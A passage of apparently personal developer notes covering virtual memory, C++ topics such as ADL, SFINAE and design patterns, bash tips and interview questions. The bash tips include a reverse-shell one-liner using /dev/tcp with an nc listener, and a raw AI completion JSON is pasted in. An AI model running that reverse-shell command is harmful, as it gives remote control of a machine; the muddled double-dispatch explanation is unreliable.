  3. Efficient Memory Management: Virtual memory allows the computer to manage memory more efficiently by using a technique called paging. This involves transferring data between physical memory and the hard drive, allowing the computer to free up physical memory for other processes when needed.

  4. Flexibility: Virtual memory allows for more flexibility in managing memory resources. It can allocate memory to different programs as needed, and adjust the amount of memory assigned to each program based on its usage. This ensures that the system runs smoothly and efficiently without any program causing it to crash due to lack of memory.

  5. Multi-Tasking: Virtual memory enables a computer to run multiple programs at the same time, even if each program requires more memory than is physically available. This allows for efficient multi-tasking, where users can switch between different programs seamlessly without any noticeable slowdowns.

  6. Fault Tolerance: Virtual memory can also improve system reliability and stability. If a program crashes or encounters an error, virtual memory can prevent the entire system from crashing by isolating the faulty program and allowing other programs to continue running.

  7. Compatibility: Virtual memory is compatible with most operating systems and hardware configurations. This makes it a versatile solution for managing memory resources on various types of computers, from personal laptops to large servers.

  8. Better User Experience: With virtual memory, users can run more complex and resource-intensive programs without experiencing slowdowns or crashes. This improves the overall user experience and allows for a smoother and more efficient workflow.

  9. Facilitates Advanced Features: Virtual memory is a prerequisite for many advanced features such as memory-mapped files, which allow data to be shared between processes, and hibernation, which saves the system state to the hard drive for fast startup. These features would not be possible without virtual memory. ___

Argument dependent lookup (aka Koenig lookup)

Argument-dependent lookup, also known as ADL, or Koenig lookup, is the set of rules for looking up the unqualified function names in function-call expressions, including implicit function calls to overloaded operators. These function names are looked up in the namespaces of their arguments in addition to the scopes and namespaces considered by the usual unqualified name lookup.

Notice begin and end parameters don’t specify a namespace, see ADL.

#include <iostream>
#include <vector>
#include <iterator>

int main() {

    const std::vector v{1, 2, 3, 4, 5};
    std::copy(cbegin(v), cend(v), std::ostream_iterator<int>(std::cout, "n"));
}

Move semantics

This a large, complicated topic. See C++ Move Semantics - The Complete Guide by Nicolai M. Josuttis.


bash

As a Linux developer you need a strong command line game. bash is ubiquitous, and a powerful language in itself, without resorting to something like Python.

git

git is awesome on the command line and pretty much essential. Use it to manage your chores. See how to undo almost anything with git.

Send a string to an IP/port

(echo hello; sleep 1) | telnet 127.0.0.1 80
echo hello > /dev/tcp/127.0.0.1/80
echo hello | nc localhost 80

Reverse shell

# server
nc -knvlp 3389

# client
bash -i >& /dev/tcp/server_ip/3389 0>&1

Target everything but one file

git add !(unit.md)
shuf -n 1 readme.txt

From bash 5.

echo $EPOCHREALTIME
1614870873.574544

echo $EPOCHSECONDS
1614870876

uptime

The three load average values are 1, 5 and 15 minutes.

uptime
15:29:28 up 20:23, 0 users, load average: 5.08, 1.49, 0.51

stress

Stress your system in different ways.

stress --cpu 8
echo $(nproc)

Synonyms for localhost

localhost
127.0.0.1
127.0.0.2
127.0.0.3
127.1
0.0.0.0
0 # wut

Move a file out of the way

mv {,_}.bash_history

Repeat a command

watch -d ip a

pushd equivalent

I use this all the time. Rather than pushd and popd to navigate around the file system:

# Navigate to new dir
cd ~/deanturpin.gitlab.io/content/post

# Return whence you came
cd -

Template metaprogramming

“Generic programming is why we can’t have nice things” – Andrei Alexandrescu

Template metaprogramming is a programming technique that uses templates in a programming language to perform computations at compile time. This technique leverages the power of templates to generate code based on types and values known at compile time.

In template metaprogramming, templates are used to define generic algorithms or data structures that can work with different data types. These templates are instantiated at compile time with specific data types, and the compiler generates specialized code for each instantiation. This allows for efficient code generation and optimization, as well as increased flexibility and reusability.

One of the key features of template metaprogramming is the ability to perform computations and make decisions at compile time. This is achieved through the use of template parameters, which can be types, constants, or other templates. These parameters can be used in conditional statements, loops, and other control structures, enabling the creation of complex compile-time computations.

Template metaprogramming is often used in C++ and other languages that support templates, such as D and Rust. It is commonly used for tasks such as type introspection, static polymorphism, and code generation. It is also used extensively in libraries and frameworks, as it allows for the creation of highly customizable and efficient code.

However, template metaprogramming can be complex and difficult to understand, and it requires a solid understanding of templates and the underlying language. It also has limitations, as not all computations can be performed at compile time, and the resulting code can be difficult to debug. Despite these challenges, template metaprogramming remains an important and powerful technique in modern programming.

Templates in the C++ Standard Library allow for generic programming, where code can be written once and used with different data types without having to rewrite the code for each type. They are used extensively in the C++ Standard Library to provide a wide range of data structures and algorithms that can be used with various types of data.

Some common examples of templates in the C++ Standard Library include:

  1. Containers: The standard library provides a variety of container classes such as vectors, lists, and maps, which can hold different types of data. These containers are implemented using templates, allowing them to store any type of data.

  2. Algorithms: The standard library also includes a large number of algorithms such as sorting, searching, and manipulating data. These algorithms are also implemented using templates, allowing them to work with different data types.

  3. Iterators: Iterators are used to traverse data structures such as containers and provide a consistent way to access elements. The standard library provides a variety of iterator types, such as input, output, and bidirectional iterators, which are all implemented using templates.

  4. Function objects: Function objects are objects that behave like functions and are commonly used in algorithms to perform operations on elements. The standard library provides a variety of function objects, such as predicates and comparators, which are implemented using templates.

  5. Smart pointers: Smart pointers are used to manage memory and provide a safer alternative to raw pointers. The standard library provides smart pointers, such as unique_ptr and shared_ptr, which are implemented using templates to work with different types of data.

Templates allow for code reuse and make the standard library more flexible and efficient. They also make it easier for developers to create their own custom data structures and algorithms that can work with different data types. Overall, templates are an essential component of the C++ Standard Library and are used extensively to provide a powerful and versatile set of tools for developers.

SFINAE

SFINAE, or "Substitution Failure Is Not An Error," is a feature of C++ template metaprogramming that allows the compiler to discard template instantiations that would otherwise result in an error. This allows for more flexible and robust code, as well as better error messages.

SFINAE works by using the compiler’s ability to deduce template arguments and call functions with different argument types. When the compiler encounters a template with a particular set of arguments, it attempts to substitute those arguments into the template and compile it. If the substitution fails due to a compiler error, SFINAE kicks in and causes the compiler to discard that template and continue searching for another one that can be instantiated successfully.

The key to SFINAE is that the compiler treats failure of template substitution as a non-fatal error, rather than halting compilation. This allows for templates to be used in a more flexible manner, as the compiler can discard templates that would result in errors and continue searching for a valid one.

SFINAE is particularly useful in situations where different code paths need to be taken based on the properties of types used as template arguments. For example, it can be used to enable different functions for different types, or to specialize templates for certain types.

Overall, SFINAE is an important feature of C++ template metaprogramming that allows for more powerful and flexible code, while also improving error handling and debugging.


Design patterns

The objective of design patterns is to provide reusable and proven solutions to common software design problems. They help developers to create flexible, maintainable, and scalable software by providing a set of standard, well-documented and tested solutions. These patterns encapsulate the knowledge and experience of expert developers, making it easier for others to understand and apply them in their own projects. By using design patterns, developers can avoid reinventing the wheel and save time and effort in developing high-quality software. They also promote consistency and standardization in software development, making it easier for teams to collaborate and communicate effectively. Ultimately, the goal of design patterns is to improve the overall quality and efficiency of software development.

Categories

Common patterns

{ “id”: “cmpl-B0z1CJ7moaVFfbtPm8MFb0Kzes1NL”, “object”: “completion”, “created”: 1739574254, “model”: “gpt-3.5-turbo-instruct:20230824-v2”, “choices”: [ { “index”: 0, “text”: “?

  1. Singleton Pattern: Ensures that only one instance of a class exists and provides a global point of access to it.

  2. Factory Pattern: Provides a way to create objects without specifying the exact class of object that will be created.

  3. Observer Pattern: Defines a one-to-many dependency between objects so that when one object changes state, all its dependents are notified and updated automatically.

  4. Decorator Pattern: Allows behavior to be added to an individual object, dynamically, without affecting the behavior of other objects from the same class.

  5. Adapter Pattern: Allows the interface of an existing class to be used as another interface. It is often used to make existing classes work with others without modifying their source code.

  6. Strategy Pattern: Defines a family of algorithms, encapsulates each one, and makes them interchangeable. It allows the algorithm to be selected at runtime.

  7. Iterator Pattern: Provides a way to access the elements of an aggregate object sequentially without exposing its underlying representation.

  8. Template Method Pattern: Defines the skeleton of an algorithm in a method, deferring some steps to subclasses. It allows subclasses to redefine certain steps of an algorithm without changing the algorithm’s structure.

  9. State Pattern: Allows an object to change its behavior when its internal state changes. It encapsulates the behavior associated with a particular state in an object.

  10. Prototype Pattern: Creates new objects by cloning existing ones, instead of creating new objects from scratch. It is useful when creating objects is time-consuming or expensive.

  11. Composite Pattern: Allows objects to be composed into tree structures to represent part-whole hierarchies. It allows clients to treat individual objects and compositions of objects uniformly.

  12. Bridge Pattern: Decouples an abstraction from its implementation so that the two can vary independently. It is useful when there are multiple implementations of an abstraction.

  13. Facade Pattern: Provides a unified interface to a set of interfaces in a subsystem. It simplifies and decouples the client from the complex subsystem.

  14. Command Pattern: Encapsulates a request as an object, allowing it to be treated as a first-class object. It allows requests to be queued, logged, and undone.

  15. Proxy Pattern: Provides a surrogate or placeholder for another object to control access to it. It is useful when creating expensive objects or when accessing remote objects.”, “finish_reason”: “stop” } ], “usage”: { “prompt_tokens”: 6, “completion_tokens”: 474, “total_tokens”: 480, “prompt_tokens_details”: { “cached_tokens”: 0, “audio_tokens”: 0 }, “completion_tokens_details”: { “reasoning_tokens”: 0, “audio_tokens”: 0, “accepted_prediction_tokens”: 0, “rejected_prediction_tokens”: 0 } } }

Factory pattern

The factory design pattern is a design pattern that falls under the creational category of design patterns. It is used to create objects without specifying the exact class of object that will be created. This pattern provides a way to create objects based on a common interface, allowing for flexibility and scalability in code.

The main idea behind the factory design pattern is to define an interface for creating objects, but let subclasses decide which class to instantiate. This allows for the creation of objects without having to specify the exact class, making the code more adaptable to change.

The basic structure of the factory design pattern consists of a factory class, which is responsible for creating objects, and a set of concrete classes that implement the common interface. The client code interacts with the factory class to create the desired objects, rather than directly creating them.

There are different types of factory design patterns, including simple factory, factory method, and abstract factory. The simple factory pattern uses a single factory class to create all types of objects, while the factory method pattern uses a separate factory method for each type of object. The abstract factory pattern uses a set of related factory classes to create families of objects.

One of the main advantages of using the factory design pattern is that it promotes loose coupling between objects, as the client code is not directly dependent on the concrete classes. This makes it easier to add new types of objects without having to modify the client code.

Another advantage is that it centralizes object creation, making it easier to manage and maintain. This can be especially useful in large codebases where there may be multiple instances of object creation.

In summary, the factory design pattern is a useful tool for creating objects in a flexible and scalable manner. It promotes loose coupling and centralizes object creation, making it a valuable pattern in software design.

Example of factory pattern

Store a system configuration in an external text file and construct at runtime using the factory pattern.

Visitor pattern

The visitor design pattern is a behavioral design pattern that allows for the separation of an algorithm from an object structure on which it operates. It allows for the addition of new operations to an object structure without modifying the objects themselves.

In this pattern, there are three main components: the visitor interface, the concrete visitor, and the element interface. The visitor interface defines the visit methods for each element in the object structure. The concrete visitor implements these visit methods and performs the desired operations on the elements. The element interface defines an accept method that allows the visitor to visit the element and perform its operations.

The visitor design pattern works by having the object structure accept a visitor, which then traverses through the structure and performs the specific operations on each element. This allows for the addition of new operations by simply creating a new concrete visitor and adding it to the object structure.

One of the key benefits of the visitor design pattern is that it allows for the addition of new operations without modifying the existing code. It also helps to keep the code clean and organized by separating the algorithm from the elements.

However, one potential downside of this pattern is that it can make the code more complex and difficult to understand, especially for beginners. It also requires a good understanding of the object structure and the operations that need to be performed on it.

Overall, the visitor design pattern is useful in situations where there are multiple operations that need to be performed on a complex object structure, and when the structure needs to be easily extensible without modifying existing code.

Double dispatch

The visitor pattern exploits a feature of subtype polymorphism named “double dispatch.”

Double dispatch is a design pattern that allows for subtype polymorphism in object-oriented programming. It allows a method to be dynamically dispatched based on the runtime type of two objects, rather than just one. This means that the same method can behave differently depending on the types of both the caller and the callee objects.

In traditional single dispatch, the method is dispatched based on the runtime type of the caller object only. This means that the same method will always behave in the same way, regardless of the type of the callee object. However, in double dispatch, the method is dispatched based on both the runtime types of the caller and callee objects, allowing for more specific and dynamic behavior.

This is achieved through the use of virtual methods, which are methods that can be overridden by subclasses. When a virtual method is called on an object, the runtime type of that object is used to determine which implementation of the method to use. With double dispatch, this determination is extended to also consider the runtime type of the method’s parameters.

For example, let’s say we have a Shape interface and two subclasses, Circle and Rectangle. Both subclasses have a draw() method that takes in a Color object as a parameter. In single dispatch, the draw() method of the Circle class would always be called when draw() is invoked on a Circle object. However, with double dispatch, the draw() method of the Circle class will be called if the callee object is a Circle and the parameter is a Color, but the draw() method of the Rectangle class will be called if the callee object is a Rectangle and the parameter is a Color.

Overall, double dispatch allows for more flexibility and dynamic behavior in polymorphism by considering the types of both the caller and callee objects.

Example of visitor pattern

Create a class hierarchy of shapes and define methods that operate on those shapes in a visitor class.

Flyweight / singleton / memento

Hardware interface classes will typically be a const register map which is a flyweight pattern. This is also an example of a singleton pattern as it’s only initialised once regardless of how many instances are created. Additionally if registers are actually wired to discrete lines they might be read-only, so the memento pattern is used to store the internal state.

Reflection

“In computer science, reflection is the ability of a process to examine, introspect, and modify its own structure and behavior.”

See Wikipedia.

Dependency inversion

Dependency inversion is a principle in software design that states that high-level modules should not depend on low-level modules, but both should depend on abstractions. This means that the dependencies between components should be inverted, with the higher-level components depending on interfaces or abstract classes that define behavior, rather than directly depending on lower-level components that implement that behavior. This allows for greater flexibility, as components can be easily substituted or changed without affecting the overall structure or functionality of the system. It also promotes modular and decoupled code, making it easier to maintain, test, and extend. Dependency inversion is a key principle in the SOLID design principles for object-oriented programming.


OpenAI generated interview questions

  1. What are the different types of data structures and when would you use each one?

  2. Explain the difference between a stack and a queue.

  3. How do you ensure that your code is efficient and scalable?

  4. Can you describe the process of object-oriented programming and provide an example?

  5. How do you approach debugging and troubleshooting when encountering errors in your code?

  6. What is the difference between a pointer and a reference in C++?

  7. What is the difference between pass by value and pass by reference?

  8. What is the difference between a class and an object in C++?

  9. How does dynamic memory allocation work in C++?

  10. What is the difference between virtual and pure virtual functions in C++?